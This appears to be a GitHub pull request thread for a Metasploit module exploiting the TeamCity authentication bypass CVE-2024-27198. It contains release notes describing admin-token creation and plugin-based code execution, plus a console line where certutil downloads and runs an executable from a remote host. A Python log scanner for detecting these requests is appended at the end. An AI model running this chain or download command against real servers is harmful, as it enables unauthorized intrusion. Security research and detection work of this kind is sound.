JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198) #18922
…so we can fall back on creating an admin user account before we upload the plugin. Creating an access token is better as we can delete the token, unlike the user account.
…optionally add some characters before the trailing .jsp
For some doubts about CVE-2024-27198, please see https://github.com/W01fh4cker/CVE-2024-27198-RCE?tab=readme-ov-file#-problem for details.
… the plugin will block. We can still get a session if we fall through here. We can't delete the plugin as access will block because we did not spawn.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit [] Command to run on remote host: certutil -urlcache -f http://192.168.1.33:12012/oiB8zh7giZOuuW2r9fc7rw %TEMP%\FMjRYTscXcH.exe & start /B %TEMP%\FMjRYTscXcH.exe
per @sec13b comment above:
The exploit is untested against Getting
There is an unknown problem with the Java payload against Linux (target 0). As of commit 0513654 a Java payload will work on Linux only if the Spawn advanced option is zero ( The issue that is breaking Java payloads on Linux, appears to be related to how Payload.java handles spawning a new Java process to run the payload. Below we can see the payload working if spawn is zero, but as the payload didn't spawn to a new process, all access to the upload plugin blocks (because the payload is running in that thread), so the exploit cannot delete the payload. Also it is non-obvious to the user to set spawn to zero.
If we set Spawn to the default value of 2 and run the exploit, we can see via There is no evidence the dropped payload runs a second time (or a third which would actually stage the payload). I'm testing on Ubuntu 22.0.4 and OpenJDK 11:
An abridged
TeamCity server is run as a user
… running the payload in a thread, and forcing the default options for Spawn to be 0
Commit 1e371d0 resolves the Java payload issue on Linux by leveraging the PayloadServlet and running the Java payload in a new thread, while setting the default options for Spawn to be 0 (so it does not drop to disk). Works great on both Linux and Windows. We can note from below, our Meterpreter is now executing in the TeamCity server process.
Thanks @sfewer-r7 for all these details. It is likely to be the issue reported in this issue and this info will help a lot.
Thank you @sfewer-r7 for this module! I left a few minor comments for now and I will start to test it.
There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit method. I believe a few things can be done:
- avoid nested if/else and begin/rescue/ensure blocks as much as possible
- break down the code in multiple methods with descriptive names
- use custom exceptions in methods, which can be handled in the main exploit method.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…login Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
… create_payload_plugin and auth_new_admin_user. Several if/unless blocks were flattened to be inline if/unless.
Thanks @cdelafuente-r7 for the great feedback. I think I have addressed all of your suggestions/questions.
I added commit 6d84f0e which reduces the
Thank you for updating this @sfewer-r7 ! Everything looks good to me now. I tested against version 2023.11.3 in a Docker installation and on Windows Server 2019, and verified I got a session with each target. I'll go ahead and land it.
Target 0 (Java) - Windows Server 2019
Target 1 (Java Server Page) - Windows Server 2019
Target 2 (Windows Command) - Windows Server 2019
Target 0 (Java) - Linux (Docker) - Windows Server 2019
Target 1 (Java Server Page) - Linux (Docker)
Target 3 (Linux Command) - Linux (Docker)
Target 4 (Unix Command) - Linux (Docker)
Release Notes
This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and the creation of a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.
This module exploits an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198). An unauthenticated attacker can leverage this to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist, so the exploit will instead create a new administrator account before uploading a plugin. Older versions of TeamCity have a debug endpoint (/app/rest/debug/process) that allows for arbitrary commands to be executed; however, recent versions of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code execution instead, as this is supported on all versions tested. For a full technical analysis of the vulnerability, please read our AttackerKB Analysis or our disclosure blog post.
The module has been tested against:
and has targets for the Java, Java Server Page, and command architectures, running on the Windows, Linux, and Unix platforms.
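A defender-side check for the two request patterns the description above calls out (REST API URIs carrying a trailing .jsp suffix, and use of the legacy /app/rest/debug/process endpoint). This is an added example, not part of the module or the PR; the log line layout ("client method request-target status") and the sample lines are constructed, not TeamCity's real access log format.

```python
import re

# Constructed sample lines; the layout is an assumption, not TeamCity's log format.
SAMPLE_LOG = """\
10.0.0.5 GET /app/rest/server 401
10.0.0.5 GET /app/rest/server/version.jsp 200
10.0.0.5 POST /app/rest/users/x/tokens.jsp 200
10.0.0.7 GET /overview.jsp 200
10.0.0.9 POST /app/rest/debug/process 200
10.0.0.5 GET /app/rest/projects 401
"""

LINE_RE = re.compile(r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3})$')
# A REST API reference anywhere in the request target that ends in ".jsp"
# (matched on the full target, query string included, so the suffix is caught
# wherever the REST path appears).
REST_JSP_RE = re.compile(r'/app/rest/.*\.jsp$', re.IGNORECASE)
DEBUG_PROCESS = '/app/rest/debug/process'


def classify(target: str):
    """Return an indicator name for a request target, or None if benign."""
    if REST_JSP_RE.search(target):
        return 'rest-uri-with-jsp-suffix'
    path = target.split('?', 1)[0].rstrip('/')
    if path == DEBUG_PROCESS:
        return 'legacy-debug-process-endpoint'
    return None


def scan_log(text: str, only_successful: bool = True):
    """Scan log text and return one finding per suspicious request.

    By default only 2xx responses are reported, since a rejected request
    is noise while an accepted one means the bypass or legacy endpoint worked.
    """
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip lines that do not fit the assumed layout
        status = int(m['status'])
        if only_successful and not 200 <= status < 300:
            continue
        kind = classify(m['target'])
        if kind:
            findings.append({'client': m['client'], 'method': m['method'],
                             'target': m['target'], 'status': status,
                             'indicator': kind})
    return findings
```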
Example